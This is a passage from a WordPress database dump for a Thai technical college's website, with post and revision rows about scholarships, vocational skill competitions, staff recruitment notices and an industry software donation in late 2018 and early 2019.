ไออาร์พีซี จำกัด (มหาชน) ผู้บริหารสถานศึกษา คณะครู นักเรียน นักศึกษา และหน่วยงานที่เกี่ยวข้องเข้าร่วมงาน ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ได้รับทุนการศึกษาเพื่อชุมชน จำนวน ๓๗ ทุน รวมเป็นเงินทั้งสิ้น ๒๙๗,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4875-autosave-v1', '', '', '2019-01-07 10:02:39', '2019-01-07 03:02:39', '', 4875, 'http://www.technicrayong.ac.th/4875-autosave-v1/', 0, 'revision', '', 0),
(4879, 3, '2019-01-07 10:03:06', '2019-01-07 03:03:06', '', '48156170_2087827881237405_7679429700233461760_n', '', 'inherit', 'closed', 'closed', '', '48156170_2087827881237405_7679429700233461760_n', '', '', '2019-01-07 10:03:06', '2019-01-07 03:03:06', '', 4875, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48156170_2087827881237405_7679429700233461760_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4880, 3, '2019-01-07 10:03:33', '2019-01-07 03:03:33', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2087828924570634&width=500\" width=\"500\" height=\"821\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ ที่ ๑๔ ธันวาคม ๒๕๖๑ บริษัท ไออาร์พีซี จำกัด(มหาชน) จัดพิธีมอบทุนการศึกษาเพื่อชุมชน ประจำปีการศึกษา ๒๕๖๑ ณ อาคารคณะผู้บริหารแผนฟื้นฟูกิจการ (IRPC Sport Complex) โดยมี นายธีรวัฒน์ สุดสุข รองผู้ว่าราชการจังหวัดระยอง ให้เกียรติเป็นประธานในพิธีเปิด และมี นายวรวุธ ปิ่นเงิน รองนายก อบจ.ระยอง นายสุพจน์ ต่ออาจเจริญ นายอำเภอเมืองระยอง นายวารินทร์ ดุษฏีวงษ์กำจร รองนายกเทศมนตรีนครระยอง นายพงศ์ประพันธ์ ฐิตทวีวัฒน์ รองกรรมการผู้จัดการใหญ่ กลุ่มธุรกิจปิโตรเคมีและการกลั่น บริษัท ไออาร์พีซี จำกัด (มหาชน) ผู้บริหารสถานศึกษา คณะครู นักเรียน นักศึกษา และหน่วยงานที่เกี่ยวข้องเข้าร่วมงาน ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ได้รับทุนการศึกษาเพื่อชุมชน จำนวน ๓๗ ทุน รวมเป็นเงินทั้งสิ้น ๒๙๗,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4875-revision-v1', '', '', '2019-01-07 10:03:33', '2019-01-07 03:03:33', '', 4875, 'http://www.technicrayong.ac.th/4875-revision-v1/', 0, 'revision', '', 0),
(4881, 3, '2019-01-07 10:10:39', '2019-01-07 03:10:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728275510881973%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๙ ธันวาคม ๒๕๖๑ คณะผู้บริหาร ครู วิทยาลัยเทคนิคระยอง และคณะผู้บริหารในสังกัดคณะกรรมการการอาชีวศึกษา เข้าร่วมรับฟังนโยบายและประชุมทางไกลผ่านระบบ Videoconference เพื่อรับมอบนโยบายการดำเนินงานจากสำนักงานคณะกรรมการการอาชีวศึกษา ณ ห้องประชุม Smart Class room อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%99-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95%e0%b9%96', '', '', '2019-01-07 10:10:39', '2019-01-07 03:10:39', '', 0, 'http://www.technicrayong.ac.th/?p=4881', 192, 'post', '', 0),
(4882, 3, '2019-01-07 10:10:19', '2019-01-07 03:10:19', '', '48393888_728272754215582_8878521888523943936_o', '', 'inherit', 'closed', 'closed', '', '48393888_728272754215582_8878521888523943936_o', '', '', '2019-01-07 10:10:19', '2019-01-07 03:10:19', '', 4881, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48393888_728272754215582_8878521888523943936_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4883, 3, '2019-01-07 10:10:39', '2019-01-07 03:10:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728275510881973%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๙ ธันวาคม ๒๕๖๑ คณะผู้บริหาร ครู วิทยาลัยเทคนิคระยอง และคณะผู้บริหารในสังกัดคณะกรรมการการอาชีวศึกษา เข้าร่วมรับฟังนโยบายและประชุมทางไกลผ่านระบบ Videoconference เพื่อรับมอบนโยบายการดำเนินงานจากสำนักงานคณะกรรมการการอาชีวศึกษา ณ ห้องประชุม Smart Class room อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4881-revision-v1', '', '', '2019-01-07 10:10:39', '2019-01-07 03:10:39', '', 4881, 'http://www.technicrayong.ac.th/4881-revision-v1/', 0, 'revision', '', 0),
(4884, 3, '2019-01-07 10:13:58', '2019-01-07 03:13:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728395320869992%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๙ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพสาขาไฟฟ้า ทักษะการเขียนโปรแกรมควบคุมด้วยโปรแกรมเมเบิลคอนโทรลเลอร์ PLC ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ นักศึกษาผู้เข้าแข่งขันทั้งสิ้น ๑๒ ทีม ณ อาคารปฏิบัติการ วิทยาลัยเทคนิคจันทบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%99-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92%e0%b9%95%e0%b9%96-2', '', '', '2019-01-07 10:13:58', '2019-01-07 03:13:58', '', 0, 'http://www.technicrayong.ac.th/?p=4884', 191, 'post', '', 0),
(4885, 3, '2019-01-07 10:13:19', '2019-01-07 03:13:19', '', '49002928_728393454203512_4397274456372805632_o', '', 'inherit', 'closed', 'closed', '', '49002928_728393454203512_4397274456372805632_o', '', '', '2019-01-07 10:13:19', '2019-01-07 03:13:19', '', 4884, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49002928_728393454203512_4397274456372805632_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4886, 3, '2019-01-07 10:13:58', '2019-01-07 03:13:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728395320869992%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๑๙ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพสาขาไฟฟ้า ทักษะการเขียนโปรแกรมควบคุมด้วยโปรแกรมเมเบิลคอนโทรลเลอร์ PLC ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ นักศึกษาผู้เข้าแข่งขันทั้งสิ้น ๑๒ ทีม ณ อาคารปฏิบัติการ วิทยาลัยเทคนิคจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4884-revision-v1', '', '', '2019-01-07 10:13:58', '2019-01-07 03:13:58', '', 4884, 'http://www.technicrayong.ac.th/4884-revision-v1/', 0, 'revision', '', 0),
(4887, 3, '2019-01-07 10:17:28', '2019-01-07 03:17:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.728291120880412%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๒๐ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพสาขาการโรงแรม ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 30 ประจำปีการศึกษา ๒๕๖๑ \"การบริการอาหารและเครื่องดื่ม Food and Beverage Service\" โดยมีคณะผู้บริหาร ครู คณะกรรมการ นักเรียน นักศึกษาผู้เข้าแข่งขัน เข้าร่วมในพิธีเปิด ซึ่งการแข่งขันจะจัดขึ้นระหว่างวันที่ ๑๘-๒๐ ธันวาคม ๒๕๖๑ ณ อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%90-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84', '', '', '2019-01-07 10:17:28', '2019-01-07 03:17:28', '', 0, 'http://www.technicrayong.ac.th/?p=4887', 190, 'post', '', 0),
(4888, 3, '2019-01-07 10:17:09', '2019-01-07 03:17:09', '', '48417458_728283394214518_7168201306358677504_o', '', 'inherit', 'closed', 'closed', '', '48417458_728283394214518_7168201306358677504_o', '', '', '2019-01-07 10:17:09', '2019-01-07 03:17:09', '', 4887, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48417458_728283394214518_7168201306358677504_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4889, 3, '2019-01-07 10:17:28', '2019-01-07 03:17:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.728291120880412%26type%3D3&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๒๐ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิดการแข่งขันทักษะวิชาชีพสาขาการโรงแรม ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 30 ประจำปีการศึกษา ๒๕๖๑ \"การบริการอาหารและเครื่องดื่ม Food and Beverage Service\" โดยมีคณะผู้บริหาร ครู คณะกรรมการ นักเรียน นักศึกษาผู้เข้าแข่งขัน เข้าร่วมในพิธีเปิด ซึ่งการแข่งขันจะจัดขึ้นระหว่างวันที่ ๑๘-๒๐ ธันวาคม ๒๕๖๑ ณ อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4887-revision-v1', '', '', '2019-01-07 10:17:28', '2019-01-07 03:17:28', '', 4887, 'http://www.technicrayong.ac.th/4887-revision-v1/', 0, 'revision', '', 0),
(4890, 3, '2019-01-07 10:34:44', '2019-01-07 03:34:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ตำแหน่ง ครูอัตราจ้าง', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-7', '', '', '2019-01-08 09:16:29', '2019-01-08 02:16:29', '', 0, 'http://www.technicrayong.ac.th/?p=4890', 189, 'post', '', 0),
(4891, 3, '2019-01-07 10:30:48', '2019-01-07 03:30:48', '', 'ประกาศ รับสมัครสอบคัดเลือกครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-7', '', '', '2019-01-07 10:30:48', '2019-01-07 03:30:48', '', 4890, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(4892, 3, '2019-01-07 10:34:44', '2019-01-07 03:34:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ตำแหน่ง ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '4890-revision-v1', '', '', '2019-01-07 10:34:44', '2019-01-07 03:34:44', '', 4890, 'http://www.technicrayong.ac.th/4890-revision-v1/', 0, 'revision', '', 0),
(4893, 3, '2019-01-07 10:38:58', '2019-01-07 03:38:58', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-8', '', '', '2019-01-08 10:10:59', '2019-01-08 03:10:59', '', 0, 'http://www.technicrayong.ac.th/?p=4893', 188, 'post', '', 0),
(4894, 3, '2019-01-07 10:38:28', '2019-01-07 03:38:28', '', 'ประกาศ รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-8', '', '', '2019-01-07 10:38:28', '2019-01-07 03:38:28', '', 4893, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ.pdf', 0, 'attachment', 'application/pdf', 0),
(4895, 3, '2019-01-07 10:38:58', '2019-01-07 03:38:58', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ', '', 'inherit', 'closed', 'closed', '', '4893-revision-v1', '', '', '2019-01-07 10:38:58', '2019-01-07 03:38:58', '', 4893, 'http://www.technicrayong.ac.th/4893-revision-v1/', 0, 'revision', '', 0),
(4896, 3, '2019-01-07 10:59:15', '2019-01-07 03:59:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728297570879767%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คุณยิ่งยง อุ่นเรือนงาม กรรมการผู้จัดการบริษัท เอ็ม พี เจ ดีสทริบิวชั่น เซ็นเตอร์ จำกัด และว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ร่วมลงนามตกลงทำความร่วมมือ(MOU) ระหว่าง บริษัท เอ็ม พี เจ ดีสทริบิวชั่น เซ็นเตอร์ จำกัด กับ วิทยาลัยเทคนิคระยอง พร้อมมอบโปรแกรมออกแบบ ๓ มิติ Solid Edge University Edition สำหรับออกแบบวิศวกรรมเครื่องกล จำนวน ๓๕ ชุด และโปรแกรมออกแบบ ๓ มิติ Solid Edge Premium-Floating สำหรับออกแบบวิศวกรรมเครื่องกลชั้นสูง จำนวน ๒ ชุด รวมมูลค่าทั้งสิ้น ๑,๗๕๐,๐๐๐ บาท ให้แก่วิทยาลัยฯ ได้ใช้ประโยชน์เพื่อการศึกษา', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a2%e0%b8%b4%e0%b9%88%e0%b8%87%e0%b8%a2%e0%b8%87-%e0%b8%ad%e0%b8%b8%e0%b9%88%e0%b8%99%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%a1-%e0%b8%81', '', '', '2019-01-07 10:59:15', '2019-01-07 03:59:15', '', 0, 'http://www.technicrayong.ac.th/?p=4896', 187, 'post', '', 0),
(4897, 3, '2019-01-07 10:58:39', '2019-01-07 03:58:39', '', '48377778_728296727546518_5541178986379345920_o', '', 'inherit', 'closed', 'closed', '', '48377778_728296727546518_5541178986379345920_o', '', '', '2019-01-07 10:58:39', '2019-01-07 03:58:39', '', 4896, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48377778_728296727546518_5541178986379345920_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4898, 3, '2019-01-07 10:59:15', '2019-01-07 03:59:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728297570879767%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คุณยิ่งยง อุ่นเรือนงาม กรรมการผู้จัดการบริษัท เอ็ม พี เจ ดีสทริบิวชั่น เซ็นเตอร์ จำกัด และว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ร่วมลงนามตกลงทำความร่วมมือ(MOU) ระหว่าง บริษัท เอ็ม พี เจ ดีสทริบิวชั่น เซ็นเตอร์ จำกัด กับ วิทยาลัยเทคนิคระยอง พร้อมมอบโปรแกรมออกแบบ ๓ มิติ Solid Edge University Edition สำหรับออกแบบวิศวกรรมเครื่องกล จำนวน ๓๕ ชุด และโปรแกรมออกแบบ ๓ มิติ Solid Edge Premium-Floating สำหรับออกแบบวิศวกรรมเครื่องกลชั้นสูง จำนวน ๒ ชุด รวมมูลค่าทั้งสิ้น ๑,๗๕๐,๐๐๐ บาท ให้แก่วิทยาลัยฯ ได้ใช้ประโยชน์เพื่อการศึกษา', '', 'inherit', 'closed', 'closed', '', '4896-revision-v1', '', '', '2019-01-07 10:59:15', '2019-01-07 03:59:15', '', 4896, 'http://www.technicrayong.ac.th/4896-revision-v1/', 0, 'revision', '', 0),
(4899, 3, '2019-01-07 11:08:15', '2019-01-07 04:08:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728421024200755%26id%3D100010985913485&width=500\" width=\"500\" height=\"507\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๒ “การประกวดวงดนตรีโฟล์คซองคนพันธุ์ R ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ที่จัดขึ้นระหว่างวันที่ ๑๗-๒๑ ธันวาคม ๒๕๖๑ ณ จังหวัดจันทบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%84%e0%b8%94%e0%b9%89', '', '', '2019-01-07 11:08:15', '2019-01-07 04:08:15', '', 0, 'http://www.technicrayong.ac.th/?p=4899', 186, 'post', '', 0),
(4900, 3, '2019-01-07 11:07:52', '2019-01-07 04:07:52', '', '48420527_728420944200763_7014242010290716672_o', '', 'inherit', 'closed', 'closed', '', '48420527_728420944200763_7014242010290716672_o', '', '', '2019-01-07 11:07:52', '2019-01-07 04:07:52', '', 4899, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48420527_728420944200763_7014242010290716672_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4901, 3, '2019-01-07 11:08:15', '2019-01-07 04:08:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728421024200755%26id%3D100010985913485&width=500\" width=\"500\" height=\"507\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๒ “การประกวดวงดนตรีโฟล์คซองคนพันธุ์ R ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ที่จัดขึ้นระหว่างวันที่ ๑๗-๒๑ ธันวาคม ๒๕๖๑ ณ จังหวัดจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4899-revision-v1', '', '', '2019-01-07 11:08:15', '2019-01-07 04:08:15', '', 4899, 'http://www.technicrayong.ac.th/4899-revision-v1/', 0, 'revision', '', 0),
(4902, 3, '2019-01-07 11:11:26', '2019-01-07 04:11:26', ' \r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2019-01-07 11:11:26', '2019-01-07 04:11:26', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
(4903, 3, '2019-01-07 11:12:26', '2019-01-07 04:12:26', '<a href=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\"><img class=\"aligncenter wp-image-4832 size-full\" src=\"/wp-content/uploads/2018/12/25-12-2561-14-36-29.png\" alt=\"\" width=\"1047\" height=\"815\" /></a>\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%82%E0%B8%84%E0%B8%A7%E0%B8%95%E0%B8%B2-%E0%B8%A0%E0%B8%B2%E0%B8%A2%E0%B8%99%E0%B8%AD%E0%B8%81edit.pdf.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลการคัดเลือกนักเรียน นักศึกษาโควตา (ภายนอก) หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4830-revision-v1', '', '', '2019-01-07 11:12:26', '2019-01-07 04:12:26', '', 4830, 'http://www.technicrayong.ac.th/4830-revision-v1/', 0, 'revision', '', 0),
